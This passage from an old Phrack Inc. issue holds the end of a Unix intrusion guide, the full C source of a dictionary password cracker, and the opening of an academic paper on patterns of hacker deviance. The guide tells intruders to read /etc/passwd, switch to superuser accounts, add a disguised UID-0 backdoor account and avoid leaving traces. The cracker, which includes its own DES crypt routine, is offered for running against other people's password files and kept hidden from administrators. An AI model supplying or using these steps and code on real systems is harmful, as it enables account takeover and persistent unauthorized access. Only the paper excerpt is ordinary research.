specified job at a specified time. The -r Removes all previously scheduled jobs.The -l reports the job and status of all jobs scheduled write [login] [tty] - Sends message to the login name. Chat! Su [login name] ~~~~~~~~~~~~~~~ The su command allows one to switch user to a super user to a user. Very important could be used to switch to super user accounts. Usage: $ su sysadm password: This su command will be monitored in /usr/adm/sulog and this file of all files is carefully monitered by the system administrator.Suppose you hacked in john's account and then switched to the sysadm account (ABOVE) your /usr/adm/su log entry would look like: SU 04/19/88 21:00 + tty 12 john-sysadm Therfore the S.A(system administrator) would know that john swithed to sysadm account on 4/19/88 at 21:00 hours Searching For Valid Login Names: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Type in- $ who ( command informs the user of other users on the system) cathy tty1 april 19 2:30 john tty2 april 19 2:19 dipal tty3 april 19 2:31 : : tty is the user's terminal, date, time each logged on. mary, dr.m are valid logins. Files worth concatenating(cat) /etc/passwd file ~~~~~~~~~~~~~~~~ The etc/passwd is a vital file to cat. For it contains login names of all users including super user accounts and there passwords. In the newer SVR3 releases they are tighting their security by moving the encrypted passwords from /etc/passwd to /etc/shadow making it only readable by root. This is optional of course. $ cat /etc/passwd root:D943/sys34:0:1:0000:/: sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh : other super user accs. : john:hacker1:34:3:john scezerend:/usr/john: : other users : $ If you have reached this far capture this file as soon as possible. This is a typical output etc/passwd file. The entries are seperated by a ":". There made be up to 7 fields in each line. Eg.sysadm account. The first is the login name in this case sysadm.The second field contains the password. The third field contains the user id."0 is the root." Then comes the group id then the account which contains the user full name etc. The sixth field is the login directory defines the full path name of the the paticular account and the last is the program to be executed. Now one can switch to other super user account using su command descibed above. The password entry in the field of the checkfsys account in the above example is "Locked;". This doesn't mean thats its a password but the account checkfsys cannot be accessed remotely. The ";" acts as an unused encryption character. A space is also used for the same purpose. You will find this in many UNIX systems that are small systems where the system administrator handles all maintaince. If the shawdowing is active the /etc/passwd would look like this: root:x:0:1:0000:/: sysadm:x:0:0:administration:/usr/admin:/bin/rsh The password filed is substituted by "x". The /etc/shawdow file only readable by root will look similar to this: root:D943/sys34:5288:: : super user accounts : Cathy:masai1:5055:7:120 : all other users : The first field contains users id: The second contains the password (The pw will be NONE if logining in remotely is deactivated): The third contains a code of when the password was last changed: The fourth and the fifth contains the minimum and the maximum numbers of days for pw changes (its rare that you will find this in the super user logins due to there hard to guess passwords) /etc/options ~~~~~~~~~~~~ The etc/options file informs one the utilities available in the system. -rwxr-xr-x 1 root sys 40 april 1:00 Basic Networking utility /etc/group ~~~~~~~~~~ The file has each group on the system. Each line will have 4 entries separated by a ":". Example of concatenated /etc/group: root::0:root adm::2:adm,root bluebox::70: Group name:password:group id:login names ** It very unlikely that groups will have passwords assigned to them ** The id "0" is assigned to / Sending And Recieving Messages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Two programs are used to manage this. They are mail & mailx. The difference between them is that mailx is more fancier thereby giving you many choices like replying message, using editors, etc. Sending ~~~~~~~ The basic format for using this command is: $mail [login(s)] (now one would enter the text after finishing enter "." a period on the next blank line) $ This command is also used to send mail to remote systems. Suppose you wanted to send mail to john on a remote called ATT01 you would type in: $mail ATT01!john Mail can be sent to several users, just by entering more login name after issuing the mail command Using mailx is the same format:(This I'll describe very briefly) $mailx john subject:(this lets you enter the subject) (line 1) (line 2) (After you finish enter (~.) not the brackets of course, more commands are available like ~p, ~r, ~v, ~m, ~h, ~b, etc.). Receiving ~~~~~~~~~ After you log on to the system you will the account may have mail waiting. You will be notified "you have mail." To read this enter: $mail (line 1) (line 2) (line 3) ? $ After the message you will be prompted with a question mark. Here you have a choice to delete it by entering d, saving it to view it later s, or just press enter to view the next message. (DON'T BE A SAVANT AND DELETE THE POOR GUY'S MAIL) Super User Commands ~~~~~~~~~~~~~~~~~~~ $sysadm adduser - will take you through a routine to add a user (may not last long) Enter this: $ sysadm adduser password: (this is what you will see) /--------------------------------------------------------------------------\ Process running succommmand `adduser` USER MANAGMENT Anytime you want to quit, type "q". If you are not sure how to answer any prompt, type "?" for help If a default appears in the question, press for the default. Enter users full name [?,q]: (enter the name you want) Enter users login ID [?,q]:(the id you want to use) Enter users ID number (default 50000) [?,q) [?,q]:( press return ) Enter group ID number or group name:(any name from /etc/group) Enter users login home directory:(enter /usr/name) This is the information for the new login: Users name: (name) login ID:(id) users ID:50000 group ID or name: home directory:/usr/name Do you want to install, edit, skip [i, e, s, q]? (enter your choice if "i" then) Login installed Do you want to give the user a password?[y,n] (its better to enter one) New password: Re-enter password: Do you want to add another login? \----------------------------------------------------------------------------/ This is the proccess to add a user. Since you hacked into a super user account you can make a super user account by doing the following by entering 0 as an user and a group ID and enter the home directory as /usr/admin. This will give you as much access as the account sysadm. **Caution** - Do not use login names like Hacker, Cracker,Phreak etc. This is a total give away. The process of adding a user wont last very long the S.A will know when he checks out the /etc/passwd file $sysadm moduser - This utility allows one to modify users. DO NOT ABUSE!! ! Password: This is what you'll see: /----------------------------------------------------------------------------\ MODIFYING USER'S LOGIN 1)chgloginid (This is to change the login ID) 2)chgpassword (Changing password) 3)chgshell (Changing directory DEFAULT = /bin/sh) ENTER A NUMBER,NAME,INITIAL PART OF OF NAME,OR ? OR ? FOR HELP, Q TO QUIT ? \----------------------------------------------------------------------------/ Try every one of them out.Do not change someones password.It creates a havoc. If you do decide to change it.Please write the original one down somewhere and change back.Try not to leave to many traces after you had your fun. In choice number 1 you will be asked for the login and then the new one. In choice number 2 you will asked for the login and then supplied by it correct password and enter a new one. In choice 3 this is used to a pchange the login shell ** Use full ** The above utilites can be used separatly for eg (To change a password one could enter: $sysadm chgpasswd not chapassword, The rest are same) $sysadm deluser - This is an obviously to delete a user password: This will be the screen output: /---------------------------------------------------------------------------\ Running subcommand 'deluser' from menu 'usermgmt' USER MANAGEMENT This fuction completely removes the user,their mail file,home directory and all files below their home directory from the machine. Enter login ID you wish to remove[q]: (eg.cathy) 'cathy' belongs to 'Cathy Franklin' whose home directory is /usr/cathy Do you want to remove this login ID 'cathy' ? [y,n,?,q] : /usr/cathy and all files under it have been deleted. Enter login ID you wish to remove [q]: \--------------------------------------------------------------------------/ This command deletes everthing owned by the user.Again this would be stupid to use. Other Super User Commands ~~~~~~~~~~~~~~~~~~~~~~~~~ wall [text] control-d - to send an anouncement to users logged in (will override mesg -n command). Execute only from / /etc/newgrp - is used to become a member of a group sysadm [program name] delgroup - delets groups diskuse - Shows free space etc. whoson - self explanatory lsgroup - Lists group mklineset -hunts various sequences Basic Networking Unility (BNU) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The BNU is a unique feature in UNIX.Some systems may not have this installed. What BNU does is allow other remote UNIXes communicate with yours without logging off the present one.BNU also allowes file transfer between computers. Most UNIX systems V will have this feature installed. The user program like cu,uux etc are located in the /usr/bin directory Basic Networking Files ~~~~~~~~~~~~~~~~~~~~~~ /usr/lib/uucp/[file name] [file name] systems - cu command to establishes link.Contains info on remote computers name, time it can be reached, login Id, password, telephone numbers devices - inter connected with systems files (Automatic call unit same in two entries) also contains baud rate, port tty1, etc. dialers - where asscii converation must be made before file tranfers etc. dialcodes - contains abreiviations for phone numbers that can be used in systems file other files are sysfiles, permissions, poll, devconfig Logining On To Remote And Sending+Receiving Files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cu - This command allows one to log on to the local as well as the remote Unix (or a non unix)without haveing to hang up so you can transfer files. Usage:[options] $ cu [-s baud rate][-o odd parity][-e even parity][-l name of comm line] telephone number | systemname To view system names that you can communicate with use the 'unname' command: Eg. of output of names: ATT01 ATT02 ATT03 ATT04 $ cu -s300 3=9872344 (9872344 is the tel) connected login: password: Local Strings ~~~~~~~~~~~~~ <~.> - will log you off the remote terminal, but not the local - puts you back on the remote unix local (the directory which you are in) "%put [file name] - reverse of above Ct ~~ ct allows local to connect to remote.Initiates a getty on a remote terminal. Usefull when using a remote terminal.BNU has call back feature that allows the user on the remote who can execute a call back meaning the local can call the remote.[ ] are options $ ct [-h prevent automatic hang up][-s bps rate][-wt set a time to call back abbrieviated t mins] telephone number Uux ~~~ To execute commands on a remote (unix to unix) usage:[ ] are options $ uux [- use standard output][-n prevent mail notification][-p also use standard output] command-string UUCP ~~~~ UUCP copies files from ones computer to the home directory of a user in remote system. This also works when copying files from one directory to another in the remote. The remote user will be notified by mail. This command becomes use full when copying files from a remote to your local system. The UUCP requires the uucico daemon will call up the remote and will perform file login sequence, file transfer, and notify the user by mail. Daemons are programs runining in the background. The 3 daemons in a Unix are uucico, uusched, uuxqt. Daemons Explained: [nows a good time to explain the 3 daemons] ~~~~~~~~~~~~~~~~~ Uuxqt - Remote execution. This daemon is executed by uudemon.hour started by cron.UUXQT searchs in the spool directory for executable file named X.file sent from the remote system. When it finds a file X .file where it obtains process which are to be executed. The next step is to find weather the processes are available at the time.The if available it checks permission and if everthing is o.k it proceeds the background proccess. Uucico - This Daemon is very immportant for it is responsible in establishing a connection to the remote also checks permission, performs login procedures,transfers + executes files and also notifies the user by mail. This daemon is called upon by uucp,uuto,uux commands. Uusched - This is executed by the shell script called uudemon.hour. This daemons acts as a randomizer before the UUCICO daemon is called. Usage: $ uucp [options] [first full path name!] file [destination path!] file example: $ uucp -m -s bbss hackers unix2!/usr/todd/hackers What this would do is send the file hackers from your computer to the remotes /usr/todd/hackers making hackers of course as file. Todd would mail that a file has been sent to him. The Unix2 is the name of the remote. Options for UUCP: (Don't forget to type in remotes name Unix2 in case) -c dont copy files to spool directory -C copy to spool -s[file name] - this file will contain the file status(above is bbss) -r Dont start the comm program(uucico) yet -j print job number(for above eg.unix2e9o3) -m send mail when file file is complete Now suppose you wanted to receive file called kenya which is in the usr/ dan/usa to your home directory /usr/john assuming that the local systems name is ATT01 and you are currently working in /usr/dan/usa,you would type in: $uucp kenya ATT01!/usr/john/kenya Uuto ~~~~ The uuto command allows one to send file to remote user and can also be used to send files locally. Usage: $ uuto [file name] [system!login name]( omit systen name if local) Conclusion ~~~~~~~~~~ Theres always more one can say about the UNIX, but its time to stop. I hope you have enjoyed the article. I apologize for the length. I hope I made the UNIX operating system more familiar. The contents of the article are all accurate to my knowledge. Hacking into any system is illegal so try to use remote dial-ups to the job. Remember do not abuse any systems you hack into for a true hacker doesn't like to wreck, but to learn. Watch for my new article on using PANAMAC airline computers coming soon. Red Knight P/HUN! <> ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 6 of 12 ()()()()()()()()()()()()()()()()()()()()()()()()()()() ()() ()() () Yet Another File On Hacking Unix! () () ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ () () By () () () () >Unknown User< () () A special "ghost" writer of Phrack Inc. () ()() ()() ()()()()()()()()()()()()()()()()()()()()()()()()()()() Greetings from The Unix Front... I am unable to use my real alias since it has now become too well known and others are able to associate it with my real name. Let us just say that I have been around for a long time, and can you say "Code Buster"? Obsolete now, nonetheless taught many how to write better ones. The following C code will enable you to ferret out poorly constructed passwords from /etc/passwd. What I mean by poor passwords is obvious, these consist of passwords based on the user's name, and even words found in the dictionary. The most secure password is one that has been constructed from nonsense words, odd combinations of one word, with control characters and numbers thrown in. My program is not able to deal with a decent password, nor did I intend it to. To write something capable of dealing with a secure password would have been incredibly complex, and take weeks to run on even the fastest of cpu's. Locate a dictionary file from your nearest Unix system. This is commonly located in /usr/dict/words. These files will vary from 200K to 5 Megabytes. The more words your dictionary file has in it, the more effective this program will be. The program can do a quick scan based on just the identifying name fields in /etc/passwd or perform a complete scan using the dictionary file. It basically compares one /etc/passwd entry to each word in your dictionary file, until it finds the password, or reaches eof,and begins the scan on the next password. It will take days to process a large /etc/passwd file. When you re-direct the output to a log file, make sure you run some sort of cron daemon that will extract any decoded passwords, and then nulls the log file. I can suggest /bin/nohup for this task since you can log off and the task continues to run. Otherwise, the log file can grow to be megabytes depending on the actual size of the /etc/passwd file and your dictionary..This program,while written with one purpose in mind (obtaining passwords),is also a positive contribution to Unix System Administrators. I run this on several systems nightly, to protect myself! Scanning for user passwords that are easy to hack, and for other insecure conditions ensures that my own systems will not be breached. Unix is still not a secure system, and restoring gigabyte file systems is no fun. I have made the software as portable as possible. It is known to compile on all BSD variants, and System V. I don't suggest that you leave the source laying around on just any system, most System Administrators are known to be particularly nosy . If you do, for God's sake crypt the damned file. These are hard times we have fallen into. The thrill of the telephone network is no more. Mere experimentation is riskier than ever. There is little left, but intellectual challenges in mastering system software and writing interesting software for most of us. As we all get older, the risks have grown less attractive versus the few gains. Someday when I am able to transfer five or six million into my account in Zurich, I may chance it. Until then, may I take the time to wish you all good luck in your endeavors, and be careful! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /* Beginning of Program */ include include include define TRUE 1 define FALSE 0 int trace = FALSE; char *dict = NULL; char *word = NULL; char *pwdfile = NULL; char *startid = NULL; FILE *pwdf; FILE *dictf; FILE *logf; char nextword[64]; char preread = FALSE; char pbuf[256]; char id[64]; char pw[64]; char goodpw[64]; main(argc,argv) int argc; char **argv; { char *passwd; char *salt; char *s; char *crypt(); char xpw[64]; char pw2[64]; char dummy[64]; char comments[64]; char shell[64]; char dictword[64]; char gotit; char important; extern int optind; extern char *optarg; int option; int cleanup(); int tried; long time(); signal(SIGTERM,cleanup); signal(SIGQUIT,cleanup); signal(SIGHUP,cleanup); while ((option = getopt(argc,argv, "d:i:p:tw:")) != EOF) switch(option) { case 'd': dict = optarg; break; case 'i': startid = optarg; break; case 'p': pwdfile = optarg; break; case 't': ++trace; break; case 'w': word = optarg; break; default: help(); } if (optind < argc) help(); if (!pwdfile) pwdfile = "/etc/passwd"; openpw(); if (dict) opendict(); while(TRUE) { if (preread) preread = FALSE; else if (!fgets(pbuf,sizeof(pbuf),pwdf)) break; parse(id,pbuf,':'); parse(xpw,pbuf,':'); parse(pw,xpw,','); if (*pw && strlen(pw) != 13) continue; parse(dummy,pbuf,':'); important = (atoi(dummy) < 5); parse(dummy,pbuf,':'); parse(comments,pbuf,':'); gotit = !*pw; if (!gotit && *comments) { strcpy(pw2,pw); do { sparse(pw2,comments); if (!*pw2) continue; if (allnum(pw2)) continue; gotit = works(pw2); if (!gotit) if (hasuc(pw2)) { lcase(pw2); gotit = works(pw2); } } while (!gotit && *comments); if (!gotit) gotit = works(id); } if (!gotit && dict) { resetdict(); tried = 0; do { if (works(nextword)) { gotit = TRUE; break; } if (++tried == 100) { printf(" <%8s> @ %ld\n",nextword,time(NULL)); fflush(stdout); tried = 0; } } while(readdict()); } if (gotit) { if (*pw) printf("** %8s \t- Password is %s\n",id,goodpw); else { parse(shell,pbuf,':'); parse(shell,pbuf,':'); shell[strlen(shell)-1] = 0; printf(" %8s \t- Open Login (Shell=%s)\n",id,shell); } if (important) printf("-------------------------------------------- Loo k!\n"); } else printf(" %8s \t- Failed\n",id); } cleanup(); exit(0); } help() { fprintf(stderr,"Scan by The Unix Front\n"); fprintf(stderr,"usage: scan [-ddict] [-iid] [-ppfile] [-t] [-wword]\n"); exit(1); } cleanup() { if (logf) fclose(logf); } openpw() { char dummy[256]; char id[256]; if (!(pwdf = fopen(pwdfile,"r"))) { fprintf("Error opening specified password file: %s\n",pwdfile); exit(2); } if (startid) { while(TRUE) { if (!(fgets(pbuf,sizeof(pbuf),pwdf))) { fprintf(stderr,"Can't skip to id '%s'\n",startid); exit(3); } strcpy(dummy,pbuf); parse(id,dummy,':'); if (!strcmp(id,startid)) { preread = TRUE; return; } } } } /* Where's the dictionary file dummy! */ opendict() { if (!(dictf = fopen(dict,"r"))) { fprintf("Error opening specified dictionary: %s\n",dict); exit(4); } } resetdict() { char *p; rewind(dictf); if (word) { while(TRUE) { if (!(fgets(nextword,sizeof(nextword),dictf))) { fprintf(stderr,"Can't start with specified word '%s'\n", word); exit(3); } if (*nextword) { p = nextword + strlen(nextword); *--p = 0; } if (!strcmp(word,nextword)) return; } } else if (!(fgets(nextword,sizeof(nextword),dictf))) fprintf(stderr,"Empty word file: %s\n",dict); else if (*nextword) { p = nextword + strlen(nextword); *--p = 0; } } readdict() { int sts; char *p; sts = fgets(nextword,sizeof(nextword),dictf); if (*nextword) { p = nextword + strlen(nextword); *--p = 0; } return sts; } works(pwd) char *pwd; { char *s; if (trace) printf(">> %8s \t- trying %s\n",id,pwd); s = crypt(pwd,pw); if (strcmp(s,pw)) return FALSE; strcpy(goodpw,pwd); return TRUE; } parse(s1,s2,t1) register char *s1; register char *s2; char t1; { char *t2; t2 = s2; while (*s2) { if (*s2 == t1) { s2++; break; } *s1++ = *s2++; } *s1 = 0; while (*t2++ = *s2++); } sparse(s1,s2) register char *s1; register char *s2; { char *t2; t2 = s2; while (*s2) { if (index(" ()[]-/.",*s2)) { s2++; break; } *s1++ = *s2++; } *s1 = 0; while (*t2++ = *s2++); } hasuc(s) register char *s; { while (*s) if (isupper(*s++)) return TRUE; return FALSE; } allnum(s) register char *s; { while(*s) if (!isdigit(*s++)) return FALSE; return TRUE; } lcase(s) register char *s; { while(*s) { if (isupper(*s)) *s = tolower(*s); ++s; } } ifdef HACKED define void int static char IP[] = { 58,50,42,34,26,18,10, 2, 60,52,44,36,28,20,12, 4, 62,54,46,38,30,22,14, 6, 64,56,48,40,32,24,16, 8, 57,49,41,33,25,17, 9, 1, 59,51,43,35,27,19,11, 3, 61,53,45,37,29,21,13, 5, 63,55,47,39,31,23,15, 7, }; static char FP[] = { 40, 8,48,16,56,24,64,32, 39, 7,47,15,55,23,63,31, 38, 6,46,14,54,22,62,30, 37, 5,45,13,53,21,61,29, 36, 4,44,12,52,20,60,28, 35, 3,43,11,51,19,59,27, 34, 2,42,10,50,18,58,26, 33, 1,41, 9,49,17,57,25, }; static char PC1_C[] = { 57,49,41,33,25,17, 9, 1,58,50,42,34,26,18, 10, 2,59,51,43,35,27, 19,11, 3,60,52,44,36, }; static char PC1_D[] = { 63,55,47,39,31,23,15, 7,62,54,46,38,30,22, 14, 6,61,53,45,37,29, 21,13, 5,28,20,12, 4, }; static char shifts[] = { 1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1, }; static char PC2_C[] = { 14,17,11,24, 1, 5, 3,28,15, 6,21,10, 23,19,12, 4,26, 8, 16, 7,27,20,13, 2, }; static char PC2_D[] = { 41,52,31,37,47,55, 30,40,51,45,33,48, 44,49,39,56,34,53, 46,42,50,36,29,32, }; static char C[28]; static char D[28]; static char KS[16][48]; static char E[48]; static char e2[] = { 32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9,10,11,12,13, 12,13,14,15,16,17, 16,17,18,19,20,21, 20,21,22,23,24,25, 24,25,26,27,28,29, 28,29,30,31,32, 1, }; void setkey(key) char *key; { register int i, j, k; int t; for(i=0; i < 28; i++) { C[i] = key[PC1_C[i]-1]; D[i] = key[PC1_D[i]-1]; } for(i=0; i < 16; i++) { for(k=0; k < shifts[i]; k++) { t = C[0]; for(j=0; j < 28-1; j++) C[j] = C[j+1]; C[27] = t; t = D[0]; for(j=0; j < 28-1; j++) D[j] = D[j+1]; D[27] = t; } for(j=0; j < 24; j++) { KS[i][j] = C[PC2_C[j]-1]; KS[i][j+24] = D[PC2_D[j]-28-1]; } } for(i=0; i < 48; i++) E[i] = e2[i]; } static char S[8][64] = { 14, 4,13, 1, 2,15,11, 8, 3,10, 6,12, 5, 9, 0, 7, 0,15, 7, 4,14, 2,13, 1,10, 6,12,11, 9, 5, 3, 8, 4, 1,14, 8,13, 6, 2,11,15,12, 9, 7, 3,10, 5, 0, 15,12, 8, 2, 4, 9, 1, 7, 5,11, 3,14,10, 0, 6,13, 15, 1, 8,14, 6,11, 3, 4, 9, 7, 2,13,12, 0, 5,10, 3,13, 4, 7,15, 2, 8,14,12, 0, 1,10, 6, 9,11, 5, 0,14, 7,11,10, 4,13, 1, 5, 8,12, 6, 9, 3, 2,15, 13, 8,10, 1, 3,15, 4, 2,11, 6, 7,12, 0, 5,14, 9, 10, 0, 9,14, 6, 3,15, 5, 1,13,12, 7,11, 4, 2, 8, 13, 7, 0, 9, 3, 4, 6,10, 2, 8, 5,14,12,11,15, 1, 13, 6, 4, 9, 8,15, 3, 0,11, 1, 2,12, 5,10,14, 7, 1,10,13, 0, 6, 9, 8, 7, 4,15,14, 3,11, 5, 2,12, 7,13,14, 3, 0, 6, 9,10, 1, 2, 8, 5,11,12, 4,15, 13, 8,11, 5, 6,15, 0, 3, 4, 7, 2,12, 1,10,14, 9, 10, 6, 9, 0,12,11, 7,13,15, 1, 3,14, 5, 2, 8, 4, 3,15, 0, 6,10, 1,13, 8, 9, 4, 5,11,12, 7, 2,14, 2,12, 4, 1, 7,10,11, 6, 8, 5, 3,15,13, 0,14, 9, 14,11, 2,12, 4, 7,13, 1, 5, 0,15,10, 3, 9, 8, 6, 4, 2, 1,11,10,13, 7, 8,15, 9,12, 5, 6, 3, 0,14, 11, 8,12, 7, 1,14, 2,13, 6,15, 0, 9,10, 4, 5, 3, 12, 1,10,15, 9, 2, 6, 8, 0,13, 3, 4,14, 7, 5,11, 10,15, 4, 2, 7,12, 9, 5, 6, 1,13,14, 0,11, 3, 8, 9,14,15, 5, 2, 8,12, 3, 7, 0, 4,10, 1,13,11, 6, 4, 3, 2,12, 9, 5,15,10,11,14, 1, 7, 6, 0, 8,13, 4,11, 2,14,15, 0, 8,13, 3,12, 9, 7, 5,10, 6, 1, 13, 0,11, 7, 4, 9, 1,10,14, 3, 5,12, 2,15, 8, 6, 1, 4,11,13,12, 3, 7,14,10,15, 6, 8, 0, 5, 9, 2, 6,11,13, 8, 1, 4,10, 7, 9, 5, 0,15,14, 2, 3,12, 13, 2, 8, 4, 6,15,11, 1,10, 9, 3,14, 5, 0,12, 7, 1,15,13, 8,10, 3, 7, 4,12, 5, 6,11, 0,14, 9, 2, 7,11, 4, 1, 9,12,14, 2, 0, 6,10,13,15, 3, 5, 8, 2, 1,14, 7, 4,10, 8,13,15,12, 9, 0, 3, 5, 6,11, }; static char P[] = { 16, 7,20,21, 29,12,28,17, 1,15,23,26, 5,18,31,10, 2, 8,24,14, 32,27, 3, 9, 19,13,30, 6, 22,11, 4,25, }; static char L[32], R[32]; static char tempL[32]; static char f[32]; static char preS[48]; void encrypt(block, edflag) char *block; int edflag; { int i, ii; register int t, j, k; for(j=0; j < 64; j++) L[j] = block[IP[j]-1]; for(ii=0; ii < 16; ii++) { if(edflag) i = 15-ii; else i = ii; for(j=0; j < 32; j++) tempL[j] = R[j]; for(j=0; j < 48; j++) preS[j] = R[E[j]-1] ^ KS[i][j]; for(j=0; j < 8; j++) { t = 6*j; k = S[j][(preS[t+0]<<5)+ (preS[t+1]<<3)+ (preS[t+2]<<2)+ (preS[t+3]<<1)+ (preS[t+4]<<0)+ (preS[t+5]<<4)]; t = 4*j; f[t+0] = (k>>3)&01; f[t+1] = (k>>2)&01; f[t+2] = (k>>1)&01; f[t+3] = (k>>0)&01; } for(j=0; j < 32; j++) R[j] = L[j] ^ f[P[j]-1]; for(j=0; j < 32; j++) L[j] = tempL[j]; } for(j=0; j < 32; j++) { t = L[j]; L[j] = R[j]; R[j] = t; } for(j=0; j < 64; j++) block[j] = L[FP[j]-1]; } char * crypt(pw, salt) char *pw, *salt; { register int i, j, c; int temp; static char block[66], iobuf[16]; for(i=0; i < 66; i++) block[i] = 0; for(i=0; (c= *pw) && i < 64; pw++) { for(j=0; j < 7; j++, i++) block[i] = (c>>(6-j)) & 01; i++; } setkey(block); for(i=0; i < 66; i++) block[i] = 0; for(i=0; i < 2; i++) { c = *salt++; iobuf[i] = c; if(c > 'Z') c -= 6; if(c > '9') c -= 7; c -= '.'; for(j=0; j < 6; j++) { if((c>>j) & 01) { temp = E[6*i+j]; E[6*i+j] = E[6*i+j+24]; E[6*i+j+24] = temp; } } } for(i=0; i < 25; i++) encrypt(block, 0); for(i=0; i < 11; i++) { c = 0; for(j=0; j < 6; j++) { c <<= 1; c |= block[6*i+j]; } c += '.'; if(c > '9') c += 7; if(c > 'Z') c += 6; iobuf[i+2] = c; } iobuf[i+2] = 0; if(iobuf[1] == 0) iobuf[1] = iobuf[0]; return(iobuf); } endif /* end of program */ _______________________________________________________________________________ ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 7 of 12 [][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Computer Hackers Follow A Guttman-Like Progression [] [] [] [] by Richard C. Hollinger [] [] University Of Florida [] [] [] [] April, 1988 [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][] Little is known about computer "hackers," those who invade the privacy of somone else's computer. This pretest gives us reason to believe that their illegal activities follow a Guttman-like involvement in deviance. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Computer crime has gained increasing attention, from news media to the legislature. The nation's first computer crime statute passed unanimously in the Florida Legislature during 1978 in response to a widely publicized incident at the Flagler Dog Track near Miami where employees used a computer to print bogus winning trifecta tickets (Miami Herald, 1977a and 1977b; Underwood, 1979). Forty-seven states and the federal government have enacted some criminal statue prohibiting unauthorized computer access, both malicious and non-malicious (BloomBecker, 1986; Scott, 1984; U.S. Public Law 98-4733, 1984; U.S. Public Law 99-474, 1986). Although some computer deviance might already have been illegal under fraud or other statutes, such rapid criminalization of this form of deviant behavior is itself an interesting social phenomenon. Parker documented thousands of computer-related incidents (1976; 1979; 1980a; 1980b; and 1983), arguing that most documented cases of computer abuse were discovered by accident. He believed that these incidents represent the tip of the iceberg. Others counter that many of these so-called computer crimes are apocryphal or not uniquely perpetrated by computer (Taber, 1980; Time, 1986). Parker's work (1976; 1983) suggests that computer offenders are typically males in the mid-twenties and thirties, acting illegally in their jobs, but others may be high school and college students (New York Times, 1984b; see related points in Hafner, 1983; Shea, 1984; New York Times, 1984a). Levy (1984) and Landreth (1985) both note that some computer aficionados have developed a "hacker ethic" allowing harmless computer exploration, including free access to files belonging to other users, bypassing passwords and security systems, outwitting bureaucrats preventing access, and opposing private software and copy protection schemes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - This research on computer hackers is based on a small number of semi-structured two-hour interviews covering many topics, including ties to other users, computer ethics, knowledge of computer crime statutes, and self-reports of using computers in an illegal fashion. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Such acts include these ten: 1. Acquiring another user's password. 2. Unauthorized use of someone else's computer account. 3. Unauthorized "browsing" among other user's computer files. 4. Unauthorized "copying" of another user's computer files. 5. Unauthorized file modification. 6. Deliberate sabotage of another user's programs. 7. Deliberately "crashing" a computer system. 8. Deliberate damage or theft of computer hardware. 9. Making an unauthorized or "pirated" copy of proprietary computer software for another user. 10. Receiving an unauthorized or "pirated" copy of proprietary computer software from another user. In 1985, a group of five students took unauthorized control of the account management system on one of the University of Florida's Digital VAX computers. They were able to allocate new accounts to each other and their friends. In addition, they browsed through other users' accounts, files and programs, and most importantly, they modified or damaged a couple of files and programs on the system. All first-time offenders, three of the five performed "community service" in consenting to being interviewed for this paper. Eight additional interviews were conducted with students selected randomly from an computer science "assembler" (advanced machine language) class. These students are required to have a working knowledge of both mainframe systems and micro computers, in addition to literacy in at least two other computer languages. The State Attorney's decision not to prosecute these non-malicious offenders under Florida's Computer Crime Act (Chapter 815) may reflect a more general trend. From research on the use (actually non-use) of computer crime statutes nationally, both BloomBecker (1986) and Pfuhl (1987) report that given the lack of a previous criminal record and the generally "prankish" nature of the vast majority of these "crimes," very few offenders are being prosecuted with these new laws. The three known offenders differed little from four of the eight computer science students in their level of self-reported computer deviance. The interviews suggest that computer deviance follows a Guttman-like progression of involvement. Four of the eight computer science respondents (including all three females) reported no significant deviant activity using the computer. They indicated no unauthorized browsing or file modification and only isolated trading of "pirated" proprietary software. When asked, none of these respondents considered themselves "hackers." However, two of the eight computer science students admitted to being very active in unauthorized use. Respondents who admitted to violations seem to fit into three categories. PIRATES reported mainly copyright infringements, such as giving or receiving illegally copied versions of popular software programs. In fact, pirating software was the most common form of computer deviance discovered, with slightly over half of the respondents indicating some level of involvement. In addition to software piracy, BROWSERS gained occasional unauthorized access to another user's university computer account and browsed the private files of others. However, they did not damage or copy these files. CRACKERS were most serious abusers. These five individuals admitted many separate instances of the other two types of computer deviance, but went beyond that. They reported copying, modifying, and sabotaging other user's computer files and programs. These respondents also reported "crashing" entire computer systems or trying to do so. Whether for normative or technical reaspons, at least in this small sample, involvement in computer crime seems to follow a Guttman-like progression. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - REFERENCES BloomBecker, Jay. 1986. Computer Crime Law Reporter: 1986 Update. Los Angeles: National Center for Computer Crime Data. Florida, State of. 1978. Florida Computer Crimes Act Chapter 815.01-815.08. Hafner, Katherine. 1983. "UCLA student penetrates DOD Network," InfoWorld 5(47): 28. Landreth, Bill. 1985. Out of the Inner Circle: A Hacker's Guide to Computer Security. Bellevue, Washington: Microsoft Press. Levy, Steven. 1984. Hackers: Heroes of the Computer Revolution. New York: Doubleday. Miami Herald. 1977a-. "Dog players bilked via computer," (September 20):1,16. --1977b "Why Flagler Dog Track was easy pickings," (September 21): 1,17. Newsweek. 1983a. "Beware: Hackers at play," (September 5): 42-46,48. --1983b. "Preventing 'WarGames'," (September 5): 48. New York Times. 1984a. "Low Tech" (January 5): 26. --1984b. "Two who raided computers pleading guilty," (March 17): 6. Parker, Donn B. 1976. Crime By Computer. New York: Charles Scribner's Sons. --1979. Computer Crime: Criminal Justice Resource Manual. Washington, D.C.: U.S. Government Printing Office. --1980a. "Computer abuse research update," Computer/Law Journal 2: 329-52. --1980b. "Computer-related white collar crime," In Gilbert Geis and Ezra Stotland (eds.), White Collar Crime: Theory and Research. Beverly Hills, CA.: Sage, pp. 199-220. --1983. Fighting 